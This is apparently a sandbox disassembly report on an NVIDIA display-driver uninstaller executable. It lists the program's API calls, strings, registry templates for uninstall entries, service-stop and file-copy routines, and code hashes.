                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00404B70
                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B9F
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 00404BD7
                                  • _memset.LIBCMT ref: 00404C74
                                  • _memset.LIBCMT ref: 00404C81
                                  Strings
                                  • AddRegName, xrefs: 00404D32
                                  • UninstCommandClass::QueryClassKeyNamesForDelete(%s,%s), xrefs: 00404B33
                                  • SYSTEM\CurrentControlSet\Control\Class\%s, xrefs: 00404B66
                                  • Elements inside g_ClassRegNamelist: %s, xrefs: 00404DFA
                                  • Enumerating Reg Path:%s, xrefs: 00404B7D
                                  • Number of subkeys: %d, xrefs: 00404E51
                                  • Number of elements inside g_ClassRegNamelist:%d, xrefs: 00404DEB
                                  • Placing back the original Class Path, xrefs: 00404F16
                                  • if %s, xrefs: 00404CD4
                                  • Could not allocate memory for szName and pValue, xrefs: 00404E32
                                  • %s\%s, xrefs: 00404EE1
                                  • set AddRegName = 0, xrefs: 00404CC0
                                  • %s%s then set AddRegName = 1, xrefs: 00404D15
                                  • Number of reg names: %d, xrefs: 00404C0B
                                  • Properties, xrefs: 00404EF3
                                  • g_ClassRegNamelist has reached its max level to store the names(count = %d). Will delete the current elements and query the names again!, xrefs: 00404DCD
                                  • Current subkey: %s, xrefs: 00404EA6
                                  • %s;%s, xrefs: 00404D85
                                  Similarity
                                  • API ID: _memset$Time_fputs$DebugFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: %s%s then set AddRegName = 1$%s;%s$%s\%s$AddRegName$Could not allocate memory for szName and pValue$Current subkey: %s$Elements inside g_ClassRegNamelist: %s$Enumerating Reg Path:%s$Number of elements inside g_ClassRegNamelist:%d$Number of reg names: %d$Number of subkeys: %d$Placing back the original Class Path$Properties$SYSTEM\CurrentControlSet\Control\Class\%s$UninstCommandClass::QueryClassKeyNamesForDelete(%s,%s)$g_ClassRegNamelist has reached its max level to store the names(count = %d). Will delete the current elements and query the names again!$if %s$set AddRegName = 0
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00402D8E
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: bCheckForValue = %s$ bDidTimeout = %s$ szKeyRoot = %s$ szSubkey = %s$ szTimeoutCommand = %s$ szValue = %s$CommandClass::WaitOnRegDel$FALSE$HKCC$HKCR$HKCU$HKDD$HKLM$HKUS$TRUE$WaitOnDelReg results:$WaitOnRegDel: Invalid number of arguments$WaitOnRegDel: Invalid registry key root$WaitOnRegDel: Invalid registry key root syntax
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00405A9A
                                  • _sprintf.LIBCMT ref: 00405B04
                                  • _memset.LIBCMT ref: 00405B24
                                  • _sprintf.LIBCMT ref: 00405B5C
                                  • _sprintf.LIBCMT ref: 00405B7C
                                  • _sprintf.LIBCMT ref: 00405B9C
                                  • _sprintf.LIBCMT ref: 00405BBC
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • copy {Given File} ,{sysdir}\\{Uninstall File}, xrefs: 00405C06
                                  • Uninstall File, xrefs: 00405AD2, 00405BFA
                                  • Setreg {NVUninst_RegKey}\MinorVersion=%d, xrefs: 00405B76
                                  • Setreg {NVUninst_RegKey}\MajorVersion=%d, xrefs: 00405B56
                                  • Display Name, xrefs: 00405ABB
                                  • Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d, xrefs: 00405AFE
                                  • Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation, xrefs: 00405B2C
                                  • Setreg {NVUninst_RegKey}\UninstallString={sysdir}\nvuninst.exe UninstallGUI, xrefs: 00405B38
                                  • Setreg {NVUninst_RegKey}\InstallLocation={sysdir}, xrefs: 00405B44
                                  • Setreg {NVUninst_RegKey}\VersionMinor=%d, xrefs: 00405BB6
                                  • Setreg {NVCompList_RegKey}\{Uninstall File}={Display Name}, xrefs: 00405BDC
                                  • Given File, xrefs: 00405BEB
                                  • Setreg {NVUninst_RegKey}\VersionMajor=%d, xrefs: 00405B96
                                  • Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers, xrefs: 00405AEA
                                  • AddUninstall: invalid number of arguments, xrefs: 00405AA6
                                  • UninstCommandClass::AddUninstall, xrefs: 00405A6E
                                  • call {Given File} ,OnAddUninstall, xrefs: 00405C12
                                  • Setreg {NVCompList_RegKey}, xrefs: 00405BD0
                                  • Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe, xrefs: 00405ADE
                                  Similarity
                                  • API ID: _sprintf$Time_fputs_memset$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: AddUninstall: invalid number of arguments$Display Name$Given File$Setreg {NVCompList_RegKey}$Setreg {NVCompList_RegKey}\{Uninstall File}={Display Name}$Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe$Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers$Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d$Setreg {NVUninst_RegKey}\InstallLocation={sysdir}$Setreg {NVUninst_RegKey}\MajorVersion=%d$Setreg {NVUninst_RegKey}\MinorVersion=%d$Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation$Setreg {NVUninst_RegKey}\UninstallString={sysdir}\nvuninst.exe UninstallGUI$Setreg {NVUninst_RegKey}\VersionMajor=%d$Setreg {NVUninst_RegKey}\VersionMinor=%d$UninstCommandClass::AddUninstall$Uninstall File$call {Given File} ,OnAddUninstall$copy {Given File} ,{sysdir}\\{Uninstall File}
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00408E91
                                    • Part of subcall function 00401C90: _sprintf.LIBCMT ref: 00401D29
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _sprintf.LIBCMT ref: 00408F48
                                  • MessageBoxA.USER32(00000000,?,?,00000004), ref: 00408F60
                                  • GetDesktopWindow.USER32 ref: 00408F6B
                                  • ShowWindow.USER32(00000000,00000000), ref: 00408FA9
                                  Strings
                                  Similarity
                                  • API ID: _sprintf$TimeWindow_fputs$DebugDesktopFormatLocalMessageMutexObjectOutputReleaseShowSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: %11%\$%s\%s$Delreg {NVCompList_RegKey}\{NVU File}$DevInstanceID$Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}$LeaveDriverStoreCache$NVU File$Setreg {NVCompList_RegKey}\{NVU File}={UNINSTALL_TAG}$Silent$SuppressUninstConfirm$UNINSTALL IN PROGRESS$UninstCommandClass:: Leave Driver Store Cache defined$UninstCommandClass:: Suppress Uninstall Confirm dialog defined$UninstCommandClass::Uninstall$Uninstall Title$Uninstall: invalid number of arguments$Yes$sysdir
                                  • API String ID: 3453233080-788238558
                                  • Opcode ID: 6724542c8fa51cf112fa10735b7c7cf7ab934b14dc5837b65e01614406380ffd
                                  • Instruction ID: 8e379383620130e4ce8354618683d6d3a2a41f9b49f3042cafe3c21d07fa54a2
                                  • Opcode Fuzzy Hash: 6724542c8fa51cf112fa10735b7c7cf7ab934b14dc5837b65e01614406380ffd
                                  • Instruction Fuzzy Hash: 8F611F7174470427D61066364E12BAF768A8B94B48F14053FFD45B73C3EEBDAA05429E
                                  APIs
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • GetFileAttributesA.KERNEL32(?), ref: 004088A0
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  • UninstCommandClass::NvCopyFile - Copy failed, xrefs: 00408963, 00408A3F
                                  • UninstCommandClass::NvCopyFile - Source and destination are identical, skipping copy, xrefs: 0040887B
                                  • NvCopyFile: source file doesn't exist, xrefs: 004088B1
                                  • NvCopyFile: invalid number of arguments, xrefs: 0040884B
                                  • NvCopyFile: second parameter is a directory instead of a file, xrefs: 004088EC
                                  • %s\%s, xrefs: 004089C3
                                  • NULL, xrefs: 00408825, 00408920, 0040892F, 004089EB
                                  • UninstCommandClass::NvCopyFile(%s), xrefs: 0040882B
                                  • UninstCommandClass::NvCopyFile - Source file doesn't exist, xrefs: 004088A7
                                  • UninstCommandClass::NvCopyFile - Copying file %s to %s, xrefs: 00408936, 004089F6
                                  • UninstCommandClass::NvCopyFile - Second parameter is a directory instead of a file, xrefs: 004088E2
                                  • %c:\NV%d%d.TMP, xrefs: 0040898F
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AttributesDebugFileFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: %c:\NV%d%d.TMP$%s\%s$NULL$NvCopyFile: invalid number of arguments$NvCopyFile: second parameter is a directory instead of a file$NvCopyFile: source file doesn't exist$UninstCommandClass::NvCopyFile - Copy failed$UninstCommandClass::NvCopyFile - Copying file %s to %s$UninstCommandClass::NvCopyFile - Second parameter is a directory instead of a file$UninstCommandClass::NvCopyFile - Source and destination are identical, skipping copy$UninstCommandClass::NvCopyFile - Source file doesn't exist$UninstCommandClass::NvCopyFile(%s)
                                  • API String ID: 1124541442-2715538906
                                  • Opcode ID: 9734b5d4dffe0bae3d55f4b0521468c02516e100f1bf8c9a5c0f3d24613342c2
                                  • Instruction ID: a039133c0ba5b34cc6e709e53d9ccfbde3f5d274a045da983b11c6e2e660d430
                                  • Opcode Fuzzy Hash: 9734b5d4dffe0bae3d55f4b0521468c02516e100f1bf8c9a5c0f3d24613342c2
                                  • Instruction Fuzzy Hash: DC51A5B67003006BD220B7759D82FEB73999F94704F00493FF695E22C1EB7CA94586AE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 0040581D
                                  • SetLastError.KERNEL32(00000000), ref: 00405832
                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 0040583F
                                  • ControlService.ADVAPI32(00000000,?,?), ref: 00405868
                                  • Sleep.KERNEL32(000001F4), ref: 004058A4
                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 004058AC
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 004058D3
                                  • CloseServiceHandle.ADVAPI32(?), ref: 004058DE
                                  • GetLastError.KERNEL32(?), ref: 004058F1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040590A
                                  • CloseServiceHandle.ADVAPI32(?), ref: 00405915
                                  • GetLastError.KERNEL32 ref: 00405927
                                  • CloseServiceHandle.ADVAPI32(?), ref: 00405948
                                  • CloseServiceHandle.ADVAPI32(?), ref: 0040597A
                                  Strings
                                  • Failed to stop service %s. Error code %d. Service state is %d., xrefs: 004058F9
                                  • (, xrefs: 00405882
                                  • Attempting to stop service %s., xrefs: 00405850
                                  • Failed to get service handle. Error code %d., xrefs: 0040595B
                                  • UninstCommandClass::StopServiceCallBack, xrefs: 004057E7
                                  • Service Name: %s, xrefs: 004057F8
                                  • Service Stop Code: %d., xrefs: 00405807
                                  • Service %s stopped., xrefs: 004058C3
                                  • Service does not exist., xrefs: 00405934
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$ErrorLast$OpenTime_fputs$ControlDebugFormatLocalManagerMutexObjectOutputQueryReleaseSingleSleepStatusStringWait_fprintf
                                  • String ID: ($Attempting to stop service %s.$Failed to get service handle. Error code %d.$Failed to stop service %s. Error code %d. Service state is %d.$Service %s stopped.$Service Name: %s$Service Stop Code: %d.$Service does not exist.$UninstCommandClass::StopServiceCallBack
                                  • API String ID: 2163033816-2479115717
                                  • Opcode ID: 5c8a80000254f0ccf3913f23c6a399ff9ff86d5b32e86fc5e50433ea2e46882c
                                  • Instruction ID: 8f8719483fb8023f7a8bf69f7c882357ac86cee1ca1fbeda934c7e2b16d0d67b
                                  • Opcode Fuzzy Hash: 5c8a80000254f0ccf3913f23c6a399ff9ff86d5b32e86fc5e50433ea2e46882c
                                  • Instruction Fuzzy Hash: 0741E772740310ABC210BFA5EC45DABBB9CEB94762F40453FF91192291DB799D048BFA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040AFD9
                                    • Part of subcall function 00401A50: FindFirstFileA.KERNEL32(?,?), ref: 00401ACA
                                    • Part of subcall function 00401A50: SetLastError.KERNEL32(00000000), ref: 00401ADA
                                    • Part of subcall function 00401A50: GetLastError.KERNEL32 ref: 00401AE6
                                    • Part of subcall function 00401A50: FindNextFileA.KERNEL32(00000000,?), ref: 00401B1C
                                    • Part of subcall function 00401A50: GetLastError.KERNEL32 ref: 00401B22
                                    • Part of subcall function 00401A50: FindClose.KERNEL32(00000000), ref: 00401B2A
                                  • _sprintf.LIBCMT ref: 0040B022
                                  • _memset.LIBCMT ref: 0040B042
                                  • _sprintf.LIBCMT ref: 0040B085
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  • _sprintf.LIBCMT ref: 0040B0A5
                                    • Part of subcall function 0040C051: __flsbuf.LIBCMT ref: 0040C0BF
                                  • _sprintf.LIBCMT ref: 0040B0C5
                                  • _sprintf.LIBCMT ref: 0040B0E5
                                  Strings
                                  • Setreg {NVUninst_RegKey}\MinorVersion=%d, xrefs: 0040B09F
                                  • Setreg {NVUninst_RegKey}\MajorVersion=%d, xrefs: 0040B07F
                                  • {sysdir}\*.nvu, xrefs: 0040B105
                                  • Setreg {NVUninst_RegKey}\UninstallString={sysdir}\{current parser name} UninstallGUI, xrefs: 0040B055
                                  • Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d, xrefs: 0040B01C
                                  • {sysdir}\nvu*.exe, xrefs: 0040AFB5
                                  • Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation, xrefs: 0040B061
                                  • Setreg {NVUninst_RegKey}\InstallLocation={sysdir}, xrefs: 0040B06D
                                  • Setreg {NVUninst_RegKey}\VersionMinor=%d, xrefs: 0040B0DF
                                  • Setreg {NVUninst_RegKey}\VersionMajor=%d, xrefs: 0040B0BF
                                  • Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers, xrefs: 0040B008
                                  • SetReg {NVUninst_RegKey}\UninstDataVerified=1, xrefs: 0040B15C
                                  • {UninstRegkey}\{*}, xrefs: 0040B12B
                                  • Setreg {NVCompList_RegKey}, xrefs: 0040B0F9
                                  • Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe, xrefs: 0040AFFC
                                  • UninstCommandClass::ReConfig2UseUninstGUI, xrefs: 0040AFA6
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$ErrorFindLast$FileTime_fputs_memset$CloseDebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait__flsbuf__output_l_fprintf
                                  • String ID: SetReg {NVUninst_RegKey}\UninstDataVerified=1$Setreg {NVCompList_RegKey}$Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe$Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers$Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d$Setreg {NVUninst_RegKey}\InstallLocation={sysdir}$Setreg {NVUninst_RegKey}\MajorVersion=%d$Setreg {NVUninst_RegKey}\MinorVersion=%d$Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation$Setreg {NVUninst_RegKey}\UninstallString={sysdir}\{current parser name} UninstallGUI$Setreg {NVUninst_RegKey}\VersionMajor=%d$Setreg {NVUninst_RegKey}\VersionMinor=%d$UninstCommandClass::ReConfig2UseUninstGUI${UninstRegkey}\{*}${sysdir}\*.nvu${sysdir}\nvu*.exe
                                  • API String ID: 4073646355-2385717040
                                  • Opcode ID: 855db544435c6aa114258c3983ec9c1564e9080ca8cddabba0ecf3942d9da265
                                  • Instruction ID: a98bd402f7d999ba69e77d247a110338cebfd24b00f2be8ff21fa6d0cbc3f162
                                  • Opcode Fuzzy Hash: 855db544435c6aa114258c3983ec9c1564e9080ca8cddabba0ecf3942d9da265
                                  • Instruction Fuzzy Hash: C0419CB1748310B6D205F6625C57FAF22994B94B08F50043FB545B62C2FEFDA64982DF
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • __strdup.LIBCMT ref: 00404344
                                  • __strdup.LIBCMT ref: 0040435D
                                    • Part of subcall function 0040D4C5: _strlen.LIBCMT ref: 0040D4D8
                                    • Part of subcall function 0040D4C5: _malloc.LIBCMT ref: 0040D4E1
                                    • Part of subcall function 0040D4C5: _strcpy_s.LIBCMT ref: 0040D4F1
                                    • Part of subcall function 0040D4C5: __invoke_watson.LIBCMT ref: 0040D502
                                  • __strdup.LIBCMT ref: 00404377
                                  • __strdup.LIBCMT ref: 00404391
                                  • __strdup.LIBCMT ref: 004043AB
                                  • __strdup.LIBCMT ref: 004043C5
                                  • __strdup.LIBCMT ref: 004043DE
                                  • __strdup.LIBCMT ref: 004043F3
                                  • __strdup.LIBCMT ref: 00404408
                                  • __strdup.LIBCMT ref: 0040441D
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __strdup$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__invoke_watson_fprintf_malloc_strcpy_s_strlen
                                  • String ID: Current Root Key$GetBaseKey: unknown basekey for registry string$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_PERFORMANCE_DATA$HKEY_USERS$HKLM$HKPD$HKU$UninstCommandClass::GetBaseKey(%s)
                                  • API String ID: 1364564273-1417559939
                                  • Opcode ID: 82c500d7cf9eb2ec896d0a926c75c73172bebc4e880bed359c5f2a648d5cddbd
                                  • Instruction ID: 25fa075fb6db4cab69ab63d03ab34403816fbeca2fa5f7e0c96b3cdd8f8a1041
                                  • Opcode Fuzzy Hash: 82c500d7cf9eb2ec896d0a926c75c73172bebc4e880bed359c5f2a648d5cddbd
                                  • Instruction Fuzzy Hash: 8B41D0B1B443009FD361DF26AC8276A3BA4AB85714F64413FF908A7392DB3C5465CB9E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,0000100C,000000FF,00000000), ref: 00407442
                                  • IsDlgButtonChecked.USER32(?,000003F6), ref: 0040744C
                                  • IsDlgButtonChecked.USER32(?,000003F1), ref: 0040745C
                                  • SendMessageA.USER32(?,0000102C,00000000,0000F000), ref: 0040749A
                                  • SendMessageA.USER32 ref: 004074CE
                                  • SendMessageA.USER32(?,0000100C,00000000,00000000), ref: 0040751F
                                  • EndDialog.USER32(?,00000001), ref: 0040752F
                                  • GetDlgItem.USER32(?,000003E9), ref: 0040757F
                                  • _memset.LIBCMT ref: 004075A6
                                  • GetDlgItem.USER32(?,000003F6), ref: 004075C8
                                  • EnableWindow.USER32(00000000), ref: 004075D1
                                  • CheckDlgButton.USER32(?,000003F1,00000001), ref: 00407621
                                  • EnableWindow.USER32(?,00000000), ref: 00407630
                                  Strings
                                  • NVIDIA Display Driver, xrefs: 004074DB
                                  • UninstCommandClass::UnInstallGUIDlg, xrefs: 004073EE
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Button$CheckedEnableItemTimeWindow_fputs$CheckDebugDialogFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset
                                  • String ID: NVIDIA Display Driver$UninstCommandClass::UnInstallGUIDlg
                                  • API String ID: 1978538268-526843834
                                  • Opcode ID: 96f4d9e65c9a7aaa1ec507ff2d41e7e1d27f02c6007ef3a51dff7e17adebee91
                                  • Instruction ID: 7748c24517757048e594ea8123445ab3cf90005cb6d811f2e1fd6e58bd807257
                                  • Opcode Fuzzy Hash: 96f4d9e65c9a7aaa1ec507ff2d41e7e1d27f02c6007ef3a51dff7e17adebee91
                                  • Instruction Fuzzy Hash: DE512B30A08305ABD720DF64DC45FBB37A8EB44700F40493EFA01A72D1CBB9A845CB9A
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,00000104,00000104,?,?), ref: 0040B1AB
                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00010009,00260010), ref: 0040B2B5
                                  • CopyFileA.KERNEL32(?,00000000,00000000), ref: 0040B2BF
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 0040B2FB
                                    • Part of subcall function 004080A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00408103
                                    • Part of subcall function 004080A0: GetFileVersionInfoSizeA.VERSION(?,?), ref: 0040810F
                                    • Part of subcall function 004080A0: GlobalAlloc.KERNEL32(00000042,00000000,?,?), ref: 0040811D
                                    • Part of subcall function 004080A0: GlobalLock.KERNEL32(00000000), ref: 0040812A
                                    • Part of subcall function 004080A0: GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 00408137
                                    • Part of subcall function 004080A0: VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 00408150
                                    • Part of subcall function 004080A0: GlobalUnlock.KERNEL32(00000000), ref: 0040817E
                                    • Part of subcall function 004080A0: GlobalFree.KERNEL32(00000000), ref: 00408185
                                    • Part of subcall function 004080A0: GetFileVersionInfoSizeA.VERSION(?,?,?,?), ref: 00408197
                                    • Part of subcall function 004080A0: GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?), ref: 004081A5
                                    • Part of subcall function 004080A0: GlobalLock.KERNEL32(00000000), ref: 004081B2
                                    • Part of subcall function 004080A0: GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 004081BF
                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00010009,00260010), ref: 0040B33D
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B34E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
